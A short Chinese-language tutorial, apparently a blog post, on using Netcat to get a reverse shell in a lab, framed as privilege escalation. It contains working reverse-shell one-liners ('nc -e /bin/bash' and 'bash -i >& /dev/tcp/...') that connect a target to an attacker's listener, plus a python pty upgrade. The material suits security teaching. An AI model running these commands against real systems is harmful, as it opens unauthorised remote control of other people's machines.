提权(2), Netcat反弹shell
一, 简介
Netcat(nc)是一款网络工具,也被称为“瑞士军刀”,可以读写TCP或UDP网络连接,透过使用TCP或UDP协议的网络连接去读写数据.
它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,它能够建立你需要的几乎所有类型的网络连接Netcat可以用于端口探测、传输文本信息、传输文件/目录、远程电子取证信息收集、远程控制等常用操作
Netcat在Linux环境下常常是自带的,如果你使用的Linux发行版本没有这个工具也可以自行安装,比如在CentOS上的安装命令就是 yum install nc -y
二, 反弹shell实验
环境:
攻击端: 192.168.112.1, kali
目标端: 192.168.112.202
由攻击者监听, 从目标端反弹shell给攻击端.
nc反弹shell
攻击端监听 5555 端口:
nc -lvp 5555
目标端反弹shell:
方式1:
这行命令的作用是使用 Netcat(nc)工具在指定的 IP 地址和端口号上创建一个反向 shell。
具体来说,它将标准输入和标准输出重定向到指定的 TCP连接上,使得远程主机可以通过该连接执行命令并获取输出, 由nc执行bash, 回显给攻击端, 攻击端不显示提示符.
nc -e /bin/bash 192.168.112.1 5555
如果要显示带提示符的交互式终端, 可以继续使用python创建虚拟终端:
python -c 'import pty;pty.spawn("/bin/bash")'
方式2:
这行命令是一个反向 shell 的命令,它将一个 bash shell 连接到指定的 IP 地址和端口号上。
具体来说,它将标准输入和标准输出重定向到一个 TCP连接上,使得远程主机可以通过该连接执行命令并获取输出, 这种方式执行后, 攻击端会显示提示符.
bash -i >& /dev/tcp/192.168.112.1/5555 0>&1
其他方式
还可以使用 telnet, awk, python, php, java等都可以反弹shell.
加密的反弹shell可以使用openssl和mkfifo加密通道.